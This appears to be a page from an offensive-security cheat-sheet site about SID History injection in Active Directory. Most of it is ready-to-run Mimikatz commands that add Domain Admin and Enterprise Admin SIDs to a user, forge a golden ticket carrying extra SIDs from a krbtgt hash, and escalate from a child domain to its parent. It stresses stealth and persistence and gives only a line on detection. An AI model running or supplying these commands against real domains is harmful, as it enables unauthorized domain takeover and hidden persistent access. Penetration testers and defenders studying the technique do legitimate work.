> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# SID History

> SID History injection: add privileged SID to user for persistent elevated access across domains.

## Overview

`sIDHistory` attribute stores previous SIDs from domain migration. If Enterprise/Domain Admin SID injected → user gets those privileges transparently.

***

## Inject SID History — Mimikatz

```cmd theme={"dark"}
mimikatz # privilege::debug
mimikatz # sid::patch
mimikatz # sid::add /sam:targetuser /new:S-1-5-21-DOMAIN-SID-500
```

### Add Enterprise Admins SID

```cmd theme={"dark"}
mimikatz # sid::add /sam:targetuser /new:S-1-5-21-PARENT-DOMAIN-SID-519
```

***

## Via Golden Ticket

Include extra SIDs in golden ticket:

```cmd theme={"dark"}
mimikatz # kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt
```

`-519` = Enterprise Admins.

***

## Check SID History

```powershell theme={"dark"}
Get-ADUser targetuser -Properties SIDHistory | Select SIDHistory
```

```bash theme={"dark"}
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(sAMAccountName=targetuser)" sIDHistory
```

***

## Cross-Domain Abuse

Inject parent domain's Domain Admins SID into child domain user:

```cmd theme={"dark"}
mimikatz # sid::add /sam:childuser /new:S-1-5-21-PARENT-SID-512
```

Child domain user now has Domain Admin rights in parent domain.

***

## Notes

* Survives password changes
* Works across domain trusts (if SID filtering not enabled)
* Very stealthy — user appears normal
* Detection: audit sIDHistory attribute changes
* SID filtering blocks this across forest trusts

***

## Quick Reference

| Task                 | Command                                      |
| -------------------- | -------------------------------------------- |
| Inject SID           | `mimikatz # sid::add /sam:user /new:SID`     |
| Via Golden           | `/sids:S-1-5-21-PARENT-519` in golden ticket |
| Check                | `Get-ADUser user -Properties SIDHistory`     |
| Enterprise Admin SID | `-519` from parent domain                    |
